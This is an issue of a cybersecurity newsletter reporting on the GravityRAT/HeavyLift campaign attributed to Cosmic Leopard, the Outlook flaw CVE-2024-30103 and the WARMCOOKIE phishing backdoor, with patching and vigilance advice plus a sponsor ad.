Jun 13 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter thatβs reeling in the latest threats hook, line, and sinker! π£π£π£
Todayβs hottest cybersecurity news stories:
π₯Β π± Android, Windows, Mac users beware! Pakistani malware lurks π
π§ Microsoft Outlook flaw discovered that would allow zero-click attack
π£ Phishermen are using WARMCOOKIE as bait in backdoor campaign
Threat actors tied to Pakistan have been orchestrating a malware campaign called Operation Celestial Force since 2018. This campaign uses Android malware GravityRAT and Windows malware loader HeavyLift, managed via GravityAdmin.
π Meet Cosmic Leopard
Cisco Talos tracks this adversary under the name Cosmic Leopard (aka SpaceCobra), showing tactical overlap with Transparent Tribe. The malware suite targets users in the Indian subcontinent, highlighting its success and ongoing evolution.
π± Multi-platform Threat
GravityRAT, first detected in 2018 as a Windows malware, now targets Android and macOS. It has been used to harvest sensitive info from military personnel in India and Pakistan Air Force, disguised as cloud storage, entertainment, and chat apps.
π Coordinated Attacks
Cosmic Leopard employs spear-phishing and social engineering to lure targets into downloading GravityRAT or HeavyLift. GravityAdmin coordinates these attacks, with campaigns like 'FOXTROT' and 'CRAFTWITHME' marking specific operations.
π₯οΈ HeavyLift's Role
HeavyLift, a new addition, targets Windows systems via malicious installers. It gathers system data and checks a C2 server for new payloads, functioning similarly on macOS.
π₯ Targeting Defense and Government
This campaign mainly targets Indian defence, government, and tech sectors. Researchers emphasise the sophistication and long-term persistence of this operation.
Stay alert and secure! ππ
Whether youβre starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.
Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.
Instantly calculate how much time you can save with Vanta.
A serious zero-click remote code execution (RCE) vulnerability, CVE-2024-30103, has been discovered in Microsoft Outlook. This flaw allows attackers to run arbitrary code via a specially designed email, with no user interaction needed.
π§ Zero-Click Danger
CVE-2024-30103 is alarming because it doesn't require any action from the user. Just opening the malicious email is enough to compromise the system, making it a potent tool for cybercriminals.
π‘οΈ How It Works
Morphisec's analysis reveals that the vulnerability exploits the way Outlook processes certain email components. A buffer overflow is triggered when the crafted email is opened, allowing the attacker to execute arbitrary code with the user's privileges. This can lead to full system compromise, data theft, or malware spread.
π Widespread Impact
With Microsoft Outlook's extensive use in both corporate and personal environments, CVE-2024-30103 poses a significant risk. Successful exploits could result in major data breaches, financial losses, and reputational damage for organisations.
π§ Mitigation Steps
Microsoft has released a security patch to fix this issue. Users and administrators should immediately apply the latest updates. Enhanced email filtering and monitoring solutions are also recommended to detect and block malicious emails.
π¬ Expert Advice
"Zero-click vulnerabilities are particularly dangerous due to their lack of user interaction," a Morphisec spokesperson noted. "Organisations must prioritise patching and adopt multi-layered security measures to defend against sophisticated threats."
π¨ Stay Informed and Protected
As of now, no known attacks exploiting CVE-2024-30103 are in the wild. Ensure your systems are updated and secure to mitigate risks from this critical vulnerability.
Cybersecurity researchers have uncovered a phishing campaign using job-themed lures to deliver a Windows backdoor named WARMCOOKIE. This backdoor scouts victim networks to deploy additional payloads.
π§ How It Works
Emails from fake recruitment firms like Hays and Michael Page prompt recipients to click a link for job details. After solving a CAPTCHA, a JavaScript file is dropped, initiating the download of WARMCOOKIE via PowerShell.
π‘οΈ Capabilities and Tactics
WARMCOOKIE fingerprints infected machines, captures screenshots, and drops more malicious programs. It uses a hard-coded command-and-control IP address and RC4 key for communication. The attack is tracked as REF6127.
π» Technical Breakdown
The phishing URL, hosted on compromised infrastructure, redirects victims to a landing page.
The backdoor establishes persistence using a scheduled task and performs anti-analysis checks to avoid detection.
WARMCOOKIEβs functions include reading/writing files, executing commands via cmd.exe, fetching installed applications, and taking screenshots. It resembles tools used in prior campaigns targeting various sectors.
π Global Reach
WARMCOOKIE is gaining popularity, targeting users worldwide. Itβs part of sophisticated phishing campaigns exploiting familiar job recruitment themes to lure victims.
π Related Campaigns
Trustwave SpiderLabs detailed another campaign using invoice-themed decoys and Windows search functionality in HTML code to deploy malware. The emails contain a ZIP file with an HTML that exploits the "search:" protocol, displaying a Shortcut (LNK) file that can trigger malicious operations when clicked.
π Stay Vigilant
While these attacks need user interaction, they cleverly exploit trust in familiar interfaces. Be cautious with email attachments and links, especially from unknown sources.
Stay alert and protect your systems! ππ
ποΈ Extra, Extra! Read all about it! ποΈ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
π‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday π
π΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for π
πΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πΎ
Let us know what you think.
So long and thanks for reading all the phish!